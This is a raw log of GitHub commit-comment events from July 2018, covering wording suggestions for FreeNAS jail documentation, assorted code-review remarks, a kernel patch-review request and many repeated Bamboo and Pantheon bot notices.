{"id":"7930278499","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624669,"position":601,"line":1268,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T18:10:13Z","updated_at":"2018-07-06T18:10:13Z","author_association":"CONTRIBUTOR","body":"s/Look for the configuration file in :file:`/usr/local/etc` or a subdirectory of it./The configuration file is in :file:`/usr/local/etc` or a subdirectory of :file:`/usr/local/etc`./\r\n\r\ns/Spend some time reading the software documentation/Take the time to read the software documentation/"}},"created_at":"2018-07-06T18:10:13Z"}
{"id":"7930291931","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624701,"position":623,"line":1300,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T18:13:37Z","updated_at":"2018-07-06T18:13:37Z","author_association":"CONTRIBUTOR","body":"s/Run :command:`tail /var/log/messages` to see if any error messages hint at the problem./Run :command:`tail /var/log/messages` to see any error messages if an issue is found./"}},"created_at":"2018-07-06T18:13:37Z"}
{"id":"7930292211","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29624703,"position":141,"line":328,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T18:13:42Z","updated_at":"2018-07-06T18:13:42Z","author_association":"NONE","body":"muss hier nicht noch s.close(); aufgerugen werden?"}},"created_at":"2018-07-06T18:13:42Z"}
{"id":"7930292373","type":"CommitCommentEvent","actor":{"login":"Uzui2012"},"repo":{"name":"ChopBot/RTByte"},"payload":{"comment":{"id":29624704,"position":null,"line":null,"path":null,"commit_id":"4a55dc7aa1a0b549483ed0e65f4df3190e822d06","created_at":"2018-07-06T18:13:44Z","updated_at":"2018-07-06T18:13:44Z","author_association":"CONTRIBUTOR","body":"I blame Microsoft"}},"created_at":"2018-07-06T18:13:44Z"}
{"id":"7930297687","type":"CommitCommentEvent","actor":{"login":"ianmilligan1"},"repo":{"name":"archivesunleashed/auk"},"payload":{"comment":{"id":29624719,"position":null,"line":null,"path":null,"commit_id":"7ed136dc44f6f6fc007ceafb1d0d187b0c3c1a24","created_at":"2018-07-06T18:15:03Z","updated_at":"2018-07-06T18:15:03Z","author_association":"MEMBER","body":"Some of this is still under development. In particular, I want to transform the YouTube videos into step-by-step instructions. "}},"created_at":"2018-07-06T18:15:03Z"}
{"id":"7930298562","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29624721,"position":null,"line":null,"path":null,"commit_id":"6ed28def4d8ed007a6c7ca65e5f3d52c2e326ea6","created_at":"2018-07-06T18:15:14Z","updated_at":"2018-07-06T18:15:14Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-110](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-110).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-110-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:15:14Z"}
{"id":"7930302124","type":"CommitCommentEvent","actor":{"login":"mittorn"},"repo":{"name":"RomkaZVO/lera_bot"},"payload":{"comment":{"id":29624730,"position":31,"line":8,"path":"plugins/default/video.py","commit_id":"3d3d6613e223e8a6e1ffd615676e7d415ed1a82d","created_at":"2018-07-06T18:16:07Z","updated_at":"2018-07-06T18:16:07Z","author_association":"NONE","body":"Откати это дерьмо. Оно не работает нормально. Одно видео по 10 раз повторяет. Было лучше"}},"created_at":"2018-07-06T18:16:07Z"}
{"id":"7930303015","type":"CommitCommentEvent","actor":{"login":"isnullxbh"},"repo":{"name":"isnullxbh/signals"},"payload":{"comment":{"id":29624733,"position":null,"line":null,"path":null,"commit_id":"e91af05a4c7bf24e1fa28b63bbbc47b10a28d6ae","created_at":"2018-07-06T18:16:20Z","updated_at":"2018-07-06T18:16:20Z","author_association":"OWNER","body":"@travis, sorry for that, dear friend! I use tags like it do AngularJS command :) I don't want to be a nuisance and I can stop doing this (write tags with 'at' symbol)"}},"created_at":"2018-07-06T18:16:20Z"}
{"id":"7930311520","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624753,"position":636,"line":1376,"path":"userguide/jails.rst","commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T18:18:34Z","updated_at":"2018-07-06T18:18:34Z","author_association":"CONTRIBUTOR","body":"update: \r\nThere is built-in help displayed by entering :samp:`iocage --help | less`. Each subcommand also has help. Display them by giving the subcommand name followed by the :literal:`--help` flag.\r\nto\r\nView the built-in help by entering :samp:`iocage --help | less`. View help for each subcommand by giving the subcommand name followed by the :literal:`--help` flag. "}},"created_at":"2018-07-06T18:18:34Z"}
{"id":"7930318826","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29624761,"position":null,"line":null,"path":null,"commit_id":"b21a10ba80e45d8a7343a58e8ad3aaf70fb1e4fa","created_at":"2018-07-06T18:20:28Z","updated_at":"2018-07-06T18:20:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-112](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-112).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-112-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:20:28Z"}
{"id":"7930322091","type":"CommitCommentEvent","actor":{"login":"miker"},"repo":{"name":"freenas/freenas-docs"},"payload":{"comment":{"id":29624770,"position":null,"line":null,"path":null,"commit_id":"44aeb762d62168c8d8aa6c1a06856b64c0ea03a4","created_at":"2018-07-06T18:21:21Z","updated_at":"2018-07-06T18:21:21Z","author_association":"CONTRIBUTOR","body":"Provided suggestions and clarified a few things."}},"created_at":"2018-07-06T18:21:21Z"}
{"id":"7930322647","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29624772,"position":null,"line":null,"path":null,"commit_id":"97bc76fdbc798a986d7b32149ba0e78fe03ec786","created_at":"2018-07-06T18:21:29Z","updated_at":"2018-07-06T18:21:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-57](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-57).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-57-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:21:29Z"}
{"id":"7930322992","type":"CommitCommentEvent","actor":{"login":"erlinux"},"repo":{"name":"erlinux/lctt-cli"},"payload":{"comment":{"id":29624775,"position":null,"line":null,"path":null,"commit_id":"c9bb74695763bf3145757d1299a97112a0f22b78","created_at":"2018-07-06T18:21:34Z","updated_at":"2018-07-06T18:21:34Z","author_association":"OWNER","body":"错误的 comment 不要合并"}},"created_at":"2018-07-06T18:21:34Z"}
{"id":"7930323672","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624778,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:21:44Z","updated_at":"2018-07-06T18:21:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:21:44Z"}
{"id":"7930328366","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624787,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-06T18:22:56Z","updated_at":"2018-07-06T18:22:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:22:56Z"}
{"id":"7930329968","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624789,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-06T18:23:21Z","updated_at":"2018-07-06T18:23:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:23:21Z"}
{"id":"7930331346","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624793,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-06T18:23:43Z","updated_at":"2018-07-06T18:23:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:23:43Z"}
{"id":"7930332938","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624795,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T18:24:08Z","updated_at":"2018-07-06T18:24:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:24:08Z"}
{"id":"7930333217","type":"CommitCommentEvent","actor":{"login":"mrunal46"},"repo":{"name":"mrunal46/sorting-"},"payload":{"comment":{"id":29624796,"position":null,"line":null,"path":null,"commit_id":"abaff03f230e71e5c9609fff17d969da14e99713","created_at":"2018-07-06T18:24:12Z","updated_at":"2018-07-06T18:24:12Z","author_association":"OWNER","body":"implements insertion sort"}},"created_at":"2018-07-06T18:24:12Z"}
{"id":"7930334279","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624799,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-06T18:24:29Z","updated_at":"2018-07-06T18:24:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:24:29Z"}
{"id":"7930349879","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624842,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-06T18:28:27Z","updated_at":"2018-07-06T18:28:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:28:27Z"}
{"id":"7930351131","type":"CommitCommentEvent","actor":{"login":"dvyukov"},"repo":{"name":"google/syzkaller"},"payload":{"comment":{"id":29624845,"position":null,"line":null,"path":null,"commit_id":"1c9d3058949b33a8714b7f8034eee566cfc526bd","created_at":"2018-07-06T18:28:46Z","updated_at":"2018-07-06T18:28:46Z","author_association":"COLLABORATOR","body":"FYI @brho\r\n\r\nAFAICT the tools/dev-libs/elfutils step is not mentioned in any docs, but without it nothing works."}},"created_at":"2018-07-06T18:28:46Z"}
{"id":"7930351855","type":"CommitCommentEvent","actor":{"login":"dvyukov"},"repo":{"name":"google/syzkaller"},"payload":{"comment":{"id":29624847,"position":null,"line":null,"path":null,"commit_id":"8ebdf5923da437622f476063c058d1e3122d9225","created_at":"2018-07-06T18:28:57Z","updated_at":"2018-07-06T18:28:57Z","author_association":"COLLABORATOR","body":"FYI @brho"}},"created_at":"2018-07-06T18:28:57Z"}
{"id":"7930351885","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624848,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-06T18:28:58Z","updated_at":"2018-07-06T18:28:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:28:58Z"}
{"id":"7930351937","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624849,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-06T18:28:58Z","updated_at":"2018-07-06T18:28:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:28:58Z"}
{"id":"7930352442","type":"CommitCommentEvent","actor":{"login":"dvyukov"},"repo":{"name":"google/syzkaller"},"payload":{"comment":{"id":29624850,"position":null,"line":null,"path":null,"commit_id":"d9ed95ab6fde0d23c20e5b60130660a9535b1004","created_at":"2018-07-06T18:29:07Z","updated_at":"2018-07-06T18:29:07Z","author_association":"COLLABORATOR","body":"FYI @brho"}},"created_at":"2018-07-06T18:29:07Z"}
{"id":"7930354483","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624857,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T18:29:37Z","updated_at":"2018-07-06T18:29:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:29:37Z"}
{"id":"7930355228","type":"CommitCommentEvent","actor":{"login":"siddarajudh"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29624859,"position":30,"line":30,"path":"Documentation/timers/timekeeping.txt","commit_id":"7806f60e1d205db46eca6ad24429b3f86eda2588","created_at":"2018-07-06T18:29:46Z","updated_at":"2018-07-06T18:29:46Z","author_association":"NONE","body":"Hi Stultz,\n\nIt's my first patch going out.\nCan you please review it once before I sending it to the large group..?\n\nOn Fri, Jul 6, 2018 at 10:24 AM, John Stultz <notifications@github.com>\nwrote:\n\n> Github isn't the best review system for the kernel, but yes, I think\n> you're right the parens are in the wrong place. Feel free to submit a patch\n> to me and cc lkml. See Documentation/process/submitting-patches.rst for\n> more:\n> https://github.com/torvalds/linux/blob/master/Documentation/process/\n> submitting-patches.rst\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/torvalds/linux/commit/7806f60e1d205db46eca6ad24429b3f86eda2588#commitcomment-29616527>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AbhzQrxtNHPLXPZupKCeBDvM4hSHtvLsks5uDu2KgaJpZM4VEboE>\n> .\n>\n\n\n\n-- \nThanks & regards,\nSiddaraju D.H\n"}},"created_at":"2018-07-06T18:29:46Z"}
{"id":"7930356441","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624865,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-06T18:30:04Z","updated_at":"2018-07-06T18:30:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:30:04Z"}
{"id":"7930359997","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624874,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T18:30:47Z","updated_at":"2018-07-06T18:30:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:30:47Z"}
{"id":"7930360241","type":"CommitCommentEvent","actor":{"login":"danielgolden"},"repo":{"name":"Masterworks/Clarity-Components"},"payload":{"comment":{"id":29624875,"position":5,"line":94,"path":"clarity-html/sass/base/_layout.scss","commit_id":"17b85bffa44d7e44a7bcbceee9e1e68cca49560e","created_at":"2018-07-06T18:30:51Z","updated_at":"2018-07-06T18:30:51Z","author_association":"COLLABORATOR","body":"@Chitradip-Capitalnumbers We need a class to replace this temporary hacky way to produce the content container of the \"edit projects\" screen. `.col_12` doesn't work because it's floated to the left and this section needs to be centered. Let me know when this is ready so I can apply the updated class to this page and remove the current class from the css."}},"created_at":"2018-07-06T18:30:51Z"}
{"id":"7930361690","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624877,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-06T18:31:11Z","updated_at":"2018-07-06T18:31:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:31:11Z"}
{"id":"7930362620","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624880,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-06T18:31:26Z","updated_at":"2018-07-06T18:31:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:31:26Z"}
{"id":"7930364810","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624883,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-06T18:32:00Z","updated_at":"2018-07-06T18:32:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:32:00Z"}
{"id":"7930366095","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29624886,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-06T18:32:20Z","updated_at":"2018-07-06T18:32:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T18:32:20Z"}
